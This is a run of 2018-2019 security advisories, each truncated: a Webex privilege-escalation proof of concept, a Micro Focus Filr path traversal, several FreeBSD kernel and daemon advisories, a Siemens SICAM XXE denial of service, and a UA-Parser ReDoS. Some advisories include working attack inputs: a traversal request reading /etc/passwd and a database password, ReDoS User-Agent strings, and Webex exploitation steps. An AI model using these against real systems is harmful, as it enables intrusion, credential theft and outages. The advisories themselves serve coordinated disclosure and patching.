and folder. This will allow the attacker to run arbitrary commands with SYSTEM user privileges. The vulnerability can be exploited by copying to a local attacker controller folder, the atgpcdec.dll binary and rename it as atgpcdec.7z. Then, a previous version of the ptUpdate.exe file must be compressed as 7z and copied to the controller folder. Also, a malicious dll must be placed in the same folder, named vcruntime140.dll and compressed as vcruntime140.7z. Finally, a ptUpdate.xml file must be provided in the controller folder for the update binary (ptUpdate.exe) to treat our files as a normal update. To gain privileges, the attacker must start the service with the command line: sc start webexservice WebexService 1 989898 "attacker-controlled-path" Proof of Concept: The following proof of concept performs a 2 step attack, since starting from version 33.8.X, the application enforces the checking of signatures for all the downloaded binaries. This 2 step attack works against all the mentioned vulnerable packages. Notice that you'll need the previous versions of the ptUpdate.exe executable. Those versions are: 3307.1.1811.1500 for the first step and 3306.4.1811.1600 for the last step. To exploit version priot to 33.8.X, only one step is required (the last step in this PoC). Batch file: /- @echo off REM Contents of PoC.bat REM REM This batch file will exploit CVE-2019-1674 REM REM First, it will copy the atgpcdec.dll file from the installation REM folder to the current folder as atgpcdec.7z. Then, it will backup REM ptUpdate.exe and vcruntime140.dll files from the installation folder REM in the current folder, adding .bak to their names. Keep in mind that REM those files will be replaced (especially, vcruntime140.dll) and if REM not restored, will render the application useless. REM REM The executable ptUpdate.exe version 3307.1.1811.1500 must be REM compressed as ptUpdate0.7z and present in the current folder. REM The executable ptUpdate.exe version 3306.4.1811.1600 must be REM compressed as ptUpdate1.7z and present in the current folder. REM Both can be generated using 7zip GUI and compressing as 7z, with REM normal compression level and LZMA compression method. REM Another way is to compress both files using the command line app: REM REM 7z.exe a ptUpdate0.7z ptUpdate.exe -m0=BCJ -m1=LZMA:d=21 REM REM ptUpdate0.xml file will be used in the first stage of the atta
[SAUTH-2019-0001] - Micro Focus Filr Multiple Vulnerabilities
SecureAuth - SecureAuth Labs Advisory http://www.secureauth.com/ Micro Focus Filr Multiple Vulnerabilities 1. *Advisory Information* Title: Micro Focus Filr Multiple Vulnerabilities Advisory ID: SAUTH-2019-0001 Advisory URL: https://www.secureauth.com/labs/advisories/micro-focus-filr-multiple-vulnerabilities Date published: 2019-02-20 Date of last update: 2019-02-20 Vendors contacted: Micro Focus Release mode: Coordinated release 2. *Vulnerability Information* Class: Path traversal [CWE-22], Permissions, Privileges, and Access Control [CWE-264] Impact: Security bypass, Information leak Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2019-3474, CVE-2019-3475 3. *Vulnerability Description* Novell (now part of Micro Focus [1]) website states that: Micro Focus Filr [2] provides file access and sharing, and lets users access their home directories and network folders from desktops, mobile devices, and the Web. Users can also synchronize their files to their PC or Mac. Changes that they make to downloaded copies are kept in sync with the originals on their network file servers. And finally, users can also share files internally and externally, and those with the share can collaborate with each other by commenting on the files. A vulnerability was found in the Micro Focus Filr Appliance, which would allow an attacker with regular user access to read arbitrary files of the filesystem. Furthermore, a vulnerability in the famtd daemon could allow a local attacker to elevate privileges. 4. *Vulnerable Packages* . Micro Focus Filr 3.4.0.217. . Older versions are probably affected too, but they were not checked. 5. *Vendor Information, Solutions and Workarounds* Micro Focus released Filr 3.0 Security Update 6 that addresses the reported issues: https://download.novell.com/Download?buildid=nZUCSDkvpxk~ Also, Micro Focus published the following Security Notes: . https://support.microfocus.com/kb/doc.php?id=7023726 . https://support.microfocus.com/kb/doc.php?id=7023727 6. *Credits* These vulnerabilities were discovered and researched by Matias Choren from SecureAuth. The publication of this advisory was coordinated by Leandro Cuozzo from SecureAuth Advisories Team. 7. *Technical Description / Proof of Concept Code* 7.1. *Path Traversal* [CVE-2019-3474] The 'filename' parameter of the '/ssf/f/viewFile' endpoint is vulnerable to Path Traversal attacks. An authenticated, low-privileged user may be able to abuse this functionality in order to read arbitrary files on the filesystem. Proof of Concept: 1. As an authenticated user, upload a sample PDF file in the 'My Files' section. 2. After the upload finishes, click on the small arrow next to the file -> 'View Details'. 3. The browser will issue a few requests to the web application, one of them being the one used for displaying the thumbnail of the file we've just uploaded. This request has the following structure: /- GET /ssf/s/viewFile?binderId=44=1=folderEntry=8a82ada06851d92d016852b727f26b1b=image=t154758084657912375035546628304890001.jpg -/ 4. If the 'viewType' parameter is set to 'image', as in this case, we can escape the current directory and include arbitrary files, as long as they are readable by the 'wwwrun' user (the user Apache Tomcat is currently running as). For example, we could read the '/etc/passwd' file: /- GET /ssf/s/viewFile?binderId=44=1=folderEntry=8a82ada06851d92d016852b727f26b1b=image=../../../../../../../../../../../etc/passwd HTTP/1.1 Host: 10.2.45.32:8443 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: JSESSIONID=803689DA9BA5DA9CBA2B7DD246A50531 Connection: close -/ /- HTTP/1.1 200 OK Expires: Thu, 01 Jan 1970 00:00:00 GMT X-UA-Compatible: IE=Edge X-Content-Type-Options: nosniff Cache-Control: no-cache Strict-Transport-Security: max-age=0 X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Content-Type: image/jpeg Date: Mon, 21 Jan 2019 14:53:37 GMT Connection: close Server: Filr Content-Length: 1506 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/bin/bash <...> -/ 5. Also, an interesting file to look for would be '/vastorage/conf/vaconfig.zip'. This zip file contains a bunch of different configuration files, including 'mysql-liquibase.properties' which, among other things, defines connection parameters such as the username and password (base64 encoded) for the MySQL database: /- referencePassword==?UTF-8?B?Zmlscg==?= referenceUrl=jdbc:mysql://localhost:3306/filr?useUnicode=truecharacterEncoding=UTF-8 url=jdbc:mysql://localhost:3306/filr?useUnicode=truecharacterEncoding=UTF-8 password==?UTF-8?B?Zmlscg==?= driver=com.mysql.jdbc.Driver referenceUsername=filr referenceDriver=com.mysql.jdbc.Driver username=filr -/ 7.2. *Local Privilege Escalation* [CVE-2019-3475] As per the description: 'novell-famtd provide CIFS & NCP file access sup
FreeBSD Security Advisory FreeBSD-SA-19:02.fd
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:02.fd Security Advisory The FreeBSD Project Topic: File description reference count leak Category: core Module: unix Announced: 2019-02-05 Credits:Peter Holm Affects:FreeBSD 12.0 Corrected: 2019-02-05 17:56:22 UTC (stable/12, 12.0-STABLE) 2019-02-05 18:11:15 UTC (releng/12.0, 12.0-RELEASE-p3) 2019-02-05 17:57:30 UTC (stable/11, 11.2-STABLE) CVE Name: CVE-2019-5596 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background UNIX-domain sockets are used for inter-process communication. It is possible to use UNIX-domain sockets to transfer rights, encoded as file descriptors, to another process. II. Problem Description FreeBSD 12.0 attempts to handle the case where the receiving process does not provide a sufficiently large buffer for an incoming control message containing rights. In particular, to avoid leaking the corresponding descriptors into the receiving process' descriptor table, the kernel handles the truncation case by closing descriptors referenced by the discarded message. The code which performs this operation failed to release a reference obtained on the file corresponding to a received right. This bug can be used to cause the reference counter to wrap around and free the file structure. III. Impact A local user can exploit the bug to gain root privileges or escape from a jail. IV. Workaround No workaround is available. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, and reboot. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install # shutdown -r +30 "Rebooting for security update" 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 12.0] # fetch https://security.FreeBSD.org/patches/SA-19:02/fd.patch # fetch https://security.FreeBSD.org/patches/SA-19:02/fd.patch.asc # gpg --verify fd.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r343785 releng/12.0/ r343790 stable/11/r343786 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5596> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:02.fd.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlxZ1YFfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cK7+w/+JeFIVM0QQC1R4wJFmT3bBaRumxGCx5PN5Ufe7ub/ztwsKQKJeps1aiS3 fzw3Ck1K7+joeG+cNwZNihmAyEa2Hgk+FDhQBX531yrwF1jQ2A2oKGfkhs5e02Ng k16MV9pVlNP1zQ3wFVBjFCCvBuVJ0A8XTxALY7ivZlj2edgSH1eL4SaP1mrSD2Xu pR2amN7WkAaIqvATK0VkWjYp6kUXtI8CBtdP3hpKz88rpYoZfWxupqtghnxgjIqt iuTOhbemvYuBvB+ErbtU/6Z4ffoHt9Csrk2MM56/RZRwyHmtC4CFqtxClrUpOoa2 2OcEbR8cZyEardSES78UBjbTwlOTVd5F4o86Q1bKytHjI72ycB5yKZkyiHmdJCjs EhlaDC/rnHxdYGvBuiLqFcNU5tJiGawZZwyozCQz67dGD89QzKQurKEWQ1YJvMsW ZwwJRSHrllUyJQBdqV/R3Qoaz2koeE9633jtqHDdUYKCZAgeFdic/6u9r4Rx2Nj5 JpTZU01bwvxNZPf35WbI2L+JbygR40b3FYbZ3skBqZylp+EkPGPxGpHGAxdKWeOy rzGBukIuWnLy9pmJ574oTZymw8Psvu2DJL3C
FreeBSD Security Advisory FreeBSD-SA-19:01.syscall
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:01.syscallSecurity Advisory The FreeBSD Project Topic: System call kernel data register leak Category: core Module: kernel Announced: 2019-02-05 Credits:Konstantin Belousov Affects:All supported versions of FreeBSD. Corrected: 2019-02-05 17:52:06 UTC (stable/12, 12.0-STABLE) 2019-02-05 18:05:05 UTC (releng/12.0, 12.0-RELEASE-p3) 2019-02-05 17:54:02 UTC (stable/11, 11.2-STABLE) 2019-02-05 18:07:45 UTC (releng/11.2, 11.2-RELEASE-p9) CVE Name: CVE-2019-5595 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background The FreeBSD/amd64 architecture defines the SYSCALL instruction for syscalls, and uses registers calling conventions for passing syscalls arguments and return values in addition to the registers usage imposed by the SYSCALL and SYSRET instructions in long mode. In particular, the arguments are passed in registers specified by the C ABI, and the content of the registers specified as caller-save, is undefined after the return from syscall. II. Problem Description The callee-save registers are used by kernel and for some of them (%r8, %r10, and for non-PTI configurations, %r9) the content is not sanitized before return from syscalls, potentially leaking sensitive information. III. Impact Typically an address of some kernel data structure used in the syscall implementation, is exposed. IV. Workaround No workaround is available. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, and reboot. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install # shutdown -r +10m "Rebooting for security update" 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 12.0] # fetch https://security.FreeBSD.org/patches/SA-19:01/syscall.patch # fetch https://security.FreeBSD.org/patches/SA-19:01/syscall.patch.asc # gpg --verify syscall.patch.asc [FreeBSD 11.2] # fetch https://security.FreeBSD.org/patches/SA-19:01/syscall.11.2.patch # fetch https://security.FreeBSD.org/patches/SA-19:01/syscall.11.2.patch.asc # gpg --verify syscall.patch.11.2.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r343781 releng/12.0/ r343788 stable/11/r343782 releng/11.2/ r343789 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5595> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:01.syscall.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlxZ1X9fFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cKPZBAAlwCVtNNIuq0s8FB9LjLaVJww1WWmbVJbhw1TJyBV2yRCkWwGDLag3dJ0 EH8HwpWeL41lppjFeL6OMDZ2+wUnuShv3pAUGwodSRXsKWsp+aWqMPcNJifkVPxs DENrziUHnXkbOnbnP25eA12j0ztCz8FjKoDh+wrjuY4BL8jzBK4ZJtmYaubrFEcD GDStnEcvCNYDK8tf0rUW2lpv4oStTex5gFpZALPjq0g28kHPuctYzoOXOf9/So1i 0kwdstsIdgydsDCHv5nXij7IDohNo+5KEJuee1cIptKftmxPLuonXyP0PiO3W
CVE-2018-13798 Siemens - SICAM A8000 Series Webinterface XXE DoS
# # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # # # # Product: SICAM A8000 Series # Vendor: Siemens # CSNC ID: CSNC-2019-002 # CVE ID: CVE-2018-13798 # Subject: SICAM Webinterface XXE DoS # Risk: Medium (CVSS 3.0 Base Score: 5.3) # CVSS 3.0: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RL:O/RC:C # Effect: Unauthenticated remotely exploitable # Authors: Emanuel Duss # Nicolas Heiniger # Date: 2019-01-14 # # Introduction The Siemens SICAM A8000 RTU (Remote Terminal Unit) series is a modular device range for telecontrol and automation applications in all areas of energy supply. This device offers a web management interface for performing simple management tasks. During a penetration test, Compass found a denial-of-service vulnerability in the Siemens SICAM web server. The web management interface is vulnerable against the XXE billion laughs attack [2] using XML entities. Successful exploitation can be performed unauthenticated over the network. Affected * SICAM A8000 CP-8000 < V14 * SICAM A8000 CP-802X < V14 * SICAM A8000 CP-8050 < V2.00 Technical Description - When a login on the web management interface is performed, the following request is sent to the server: POST /sicweb-ajax/auth HTTP/1.1 Host: 10.5.23.42 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://10.5.23.42 Content-Type: application/xml Content-Length: 118 Connection: close By modifying the XML message, it's possible to perform a billion laughs denial of service attack against the web management interface: POST /sicweb-ajax/auth HTTP/1.1 Host: 10.5.23.42 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://10.5.23.42/ Content-Type: application/xml Content-Length: 1679 Connection: close ]> The XML parser on the device tries to resolve the external entities. This will consume all available memory and the web management interface does not respond anymore. If the web management interface is refreshed in the browser, the following message appears: The device is currently unreachable. Retrying to connect. Other services on the device, like the one used by the ToolboxII for configuring the device or the IEC104 service, will still work properly and are not affected by this attack. Only the web management interface remains unusable until the device is rebooted. It's not possible to use XXE to read local or remote files using the SYSTEM directive. Vulnerability Classification * CVSS v3.0 Base Score: 5.3 * CVSS v3.0 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RL:O/RC:C Remediation --- * SICAM A8000 CP-8000: Update to V14 * SICAM A8000 CP-802X: Update to V14 * SICAM A8000 CP-8050: Update to V2.00 or higher Please see the Siemens advisory [3] for the download links. As a workaround, it's also possible to restrict the access to the webserver on port 80/tcp and 443/tcp using a firewall. Acknowledgments --- We thank Siemens for the coordinated disclosure. Timeline 2018-05-28:Vulnerability discovered by Emanuel Duss and Nicolas Heiniger 2018-05-28:Informed customer 2018-06-06:Initial vendor notification 2018-03-18:Vendor informed us that they will publish an advisory 2019-01-08:Siemens published advisory [3] 2019-01-11:Compass published advisory containing technical information References -- [1] https://w3.siemens.com/smartgrid/global/en/products-systems-solutions/substation-automation/substation-automation/pages/sicam-a8000.aspx [2] https://www.owasp.org/index.php/XML_Security_Cheat_Sheet#Billion_Laughs [3] https://cert-portal.siemens.com/productcert/txt/ssa-579309.txt
X41 D-Sec GmbH Security Advisory X41-2018-009: ReDoS Vulnerability in UA-Parser
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 X41 D-SEC GmbH Security Advisory: X41-2018-009 ReDoS Vulnerability in UA-Parser Severity Rating: Medium Confirmed Affected Versions: 2015-05-14 and newer, commit 6fd6c261274254bcbbacd77ef4b12534c7f9923d Confirmed Patched Versions: v0.6.0 released 2018-12-14, commit 010ccdc7303546cd22b9da687c29f4a996990014 Vendor: UA-Parser Project Vendor URL: https://github.com/ua-parser Vector: HTTP request Credit: X41 D-SEC GmbH, Luc Gommans Status: Public CVE: CVE-2018-20164 CVSSv3 Score: 5.3 CVSSv3 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2018-009-uaparser/ Summary and Impact == The programming library UA-Parser uses regular expressions to identify user agent strings. The complexity of some of the regular expressions is such that an attacker can craft special patterns that keep the server busy for a long time. By sending many requests in short order, an attacker can exhaust the amount of processing power available. This causes the website to become unavailable for legitimate visitors. In common setups, the user agent string is parsed whenever a page is visited. This means that anyone can abuse the bug, typically without authentication. There are no common circumstances which would prevent an attack from working reliably, i.e. an attacker can consistently and repeatedly exploit the issue until the site has become unreachable. For more information on regular expression-based denial of service, see the OWASP page on ReDoS: https://www.owasp.org/index.php/RegularexpressionDenialofService-ReDoS The UA-Parser project consists of a core repository, uap-core, and implementations in various languages. The regular expressions are defined in the core project and each implementation is automatically vulnerable. Product Description === When a user agent (such as a browser) connects to a website, it identifies itself with a 'user agent string'. This string helps the server determine relevant content, for example to serve the appropriate installer for visitors with different operating systems. The UA-Parser project collects regular expressions that extract the type of device and operating system from these strings. Implementations in different languages are automatically vulnerable, including the reference implementation in JavaScript: <https://github.com/ua-parser/uap-ref-impl> Proof of Concept There are multiple vulnerable regular expressions. They are collected in the file regex.yaml, for example on lines 911 and 4961. The regular expression on line 911 is as follows: (x86_64|aarch64)\ (\d+)+\.(\d+)+\.(\d+)+.*Chrome.*(?:CitrixChromeApp)$ Any implementation using this library will hang for a few seconds (on comodity hardware) when sending the following HTTP request: GET / HTTP/1.0 User-Agent: x86_64 Normal user agent strings can be over a hundred bytes long: this string of 35 bytes is not an abnormal request. Adding one more byte makes the processing significantly longer. This particular regular expression was introduced in September 2018. The regular expression on line 4961 was introduced in May 2015 and can be exploited as follows: GET / HTTP/1.0 User-Agent: HbbTV/1.1.1CE-HTML/1.1;THOM;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;LF Each additional repetition of SW-Version/1; will multiply the processing time by roughly a factor 6.2. Where eleven repetitions take about seven seconds, fourteen repetitions already occupy a server for half an hour. Workarounds === As demonstrated, the input does not have to be particularly long to exploit the issue. This may be the case, and a few hundred kilobytes may slow down most regular expressions, but limiting the maximum length is not a solution by itself. The root cause is the regular expression, which should be limited in complexity. This involves manual work and there is no solution that can be applied to all regular expressions in the project. To aid in identifying problematic regular expressions, one may use projects such as <https://github.com/jagracey/RegEx-DoS>. Timeline 2018-11-26 Issue found. 2018-11-29 Permission from customer to disclose to upstream. 2018-11-29 Requested secure channel from vendor for communication. 2018-12-04 Disclosed to vendor. 2018-12-14 Patch released by vendor, CVE number requested. 2018-12-15 CVE-2018-20164 assigned. 2019-01-10 Advisory released. About X41 D-SEC GmbH X41 is an expert provider for application security services. Having extensive industry experience and expertise in the area of information security, a strong core security team of world class security experts enables X41 to perform premium security services. Fields of expertise in the area of applicat
FreeBSD Security Advisory FreeBSD-SA-18:15.bootpd
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-18:15.bootpd Security Advisory The FreeBSD Project Topic: bootpd buffer overflow Category: core Module: bootpd Announced: 2018-12-19 Credits:Reno Robert Affects:All supported versions of FreeBSD. Corrected: 2018-12-19 18:17:59 UTC (stable/12, 12.0-STABLE) 2018-12-19 18:21:07 UTC (releng/12.0, 12.0-RELEASE-p1) 2018-12-19 18:19:15 UTC (stable/11, 11.2-STABLE) 2018-12-19 18:22:25 UTC (releng/11.2, 11.2-RELEASE-p7) CVE Name: CVE-2018-17161 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background The bootpd utility implements an Internet Bootstrap Protocol (BOOTP) server as defined in RFC951, RFC1532, and RFC1533. II. Problem Description Due to insufficient validation of network-provided data it may be possible for a malicious attacker to craft a bootp packet which could cause a stack buffer overflow. III. Impact It is possible that the buffer overflow could lead to a Denial of Service or remote code execution. IV. Workaround Firewall rules may be used to limit reception of bootp packets to only trusted networks or hosts. Note that the bootp protocol is typically limited to a common layer 2 broadcast domain, although the bootpgw gateway can forward bootp requests and responses between subnets. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Restart bootpd if it is running in standalone mode. Perform one of the following: 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-18:15/bootpd.patch # fetch https://security.FreeBSD.org/patches/SA-18:15/bootpd.patch.asc # gpg --verify bootpd.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile the operating system using buildworld and installworld as described in https://www.FreeBSD.org/handbook/makeworld.html>. Restart the applicable daemons, or reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r342228 releng/12.0/ r342230 stable/11/r348229 releng/11.2/ r342231 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17161> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-18:15.bootpd.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlwane5fFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cKfzg/+PhmA1AKfXFSkeJJPvdF/7hjKpWaCdVAyUZsuWH5L1Tmb4Lc/pLjw22Ba Xh/sAKik6pa/nVTZCBgAqoCqmV8CdhScwvRZdVSP5CQ9vnM+6fFcybP0aCZOmiJC NGAE8nIBdazqWJfNM9HUSIbdqEOtMlVcyE0Ni/TxzcAFdzFowfDnyRm1wqI4zhM7 YL7pU0kTYJfydjK540rHB1tNBaYHSJ/6ckK3tkjwjVgMsQwNSizKrPsqycoMlMmD TqQMfDwU8W/jFLsr7OZE66eQBysSiuzYAv3IsipL+50SYgS0aoo3LwKrCcYGN6c/ S/0SOfNHDgd/7wregI5adKqWJceaqZCVedSVLm6ZaG1Vt3alIjczX9D7wIjuXPlD AkSKa0HnmSwDC8yWLJYMxuny7vy3uBAUnPiwIT3RrsDC0b28/uwNPbeSbG0Wrf9F 21PDMfeCPc2Vr/TVj9uSIo20pNtVhy+tGbx1Ilsgi3POa3n7pTOuFWHMzQVe3rZA DLYEbliPxpq9NFJ/2UZQg25weOD5ygwaYZnbsXAMY47D4kteeQOjzomgiacVhE56 oT8z804nGgGdCe4LpiHihDVzCbBvvuEPw9Edffzm7EWykp
FreeBSD Security Advisory FreeBSD-SA-18:14.bhyve
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-18:14.bhyve Security Advisory The FreeBSD Project Topic: Insufficient bounds checking in bhyve(8) device model Category: core Module: bhyve Announced: 2018-12-04 Credits:Reno Robert Affects:All supported versions of FreeBSD. Corrected: 2018-12-04 18:32:50 UTC (stable/11, 11.2-STABLE) 2018-12-04 18:38:32 UTC (releng/11.2, 11.2-RELEASE-p6) CVE Name: CVE-2018-17160 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background The bhyve hypervisor uses the bhyve(8) program to emulate support for most virtual devices used by guest operating systems. II. Problem Description Insufficient bounds checking in one of the device models provided by bhyve(8) can permit a guest operating system to overwrite memory in the bhyve(8) processing possibly permitting arbitary code execution. III. Impact A guest OS using a firmware image can cause the bhyve process to crash, or possibly execute arbitrary code on the host as root. IV. Workaround The device model in question is only enabled when booting guests with a firmware image such as the UEFI images from the bhyve-firmware package. Guests booted using bhyveload(8) or grub2-bhyve are not affected. Guests using operating systems supported by bhyveload(8) or grub2-bhyve can be booted using these tools as a workaround. No workaround is available for guest operating systems such as Windows that require a firmware image. V. Solution Perform one of the following: Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Afterward, restart guests using firmware images. 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-18:14/bhyve.patch # fetch https://security.FreeBSD.org/patches/SA-18:14/bhyve.patch.asc # gpg --verify bhyve.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile the operating system using buildworld and installworld as described in https://www.FreeBSD.org/handbook/makeworld.html>. Afterward, restart guests using firmware images. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/11/r341486 releng/11.2/ r341488 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17160> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-18:14.bhyve.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlwGykdfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cKcIQ/+Ktt7+SZPoWZQmJv6LdT6qI+na0+/9LDwBoC+Tj37heFUnhcMTxDDH4o3 nexELxF1xHmRchooRKfJr7npa8CF4jBzp2PSb+783q6TrFKe90ohlmt56lRB6gJg 3IJX5TxvAvLsqTgwPyALqyy3H5C8cY3btHPsZIArK0WVRTB74K3mr3L3IRVTcMCv 9cbUZyDO21ZIDTB5h9FYGo+6bg8hvZztmromkxssqlKKS8TUltGr/H3k6EHlnEA9 rG+6kswIgyeXNFrdksD6ni7L5Z3lwR/DFiU2d/lageQZ6vgDUa3c0KMhepfelfJR AiUtGpgfCDuHZ1NV2uyr9I6nPRHhdxPy3o2bF/B7+SLdn03tcZiO0tx3Wf68EQlt jAYFuup7+TFKoupsHlb2fkQxNOeQCr6dF+ikJDVgwCqmx2zn9tDo/tWoNdH+Jylx MDKsE369HOSRGR3Ua1ELEtOEzbGbcUHJyT6I1E2poctE61hYI+5te6pasY3ReN68 vyFMAo5ey0kJ6mi2YVcvDo2ZEb/GP1noJkdquYpIm8Ko0TPtivaMHXLIPcpLiJUc fBZexGCXJnb8f6ClMMU12U6f3H35Hz1AUPG3MSWHGgoczQBZJ8PEC
FreeBSD Security Advisory FreeBSD-SA-18:13.nfs
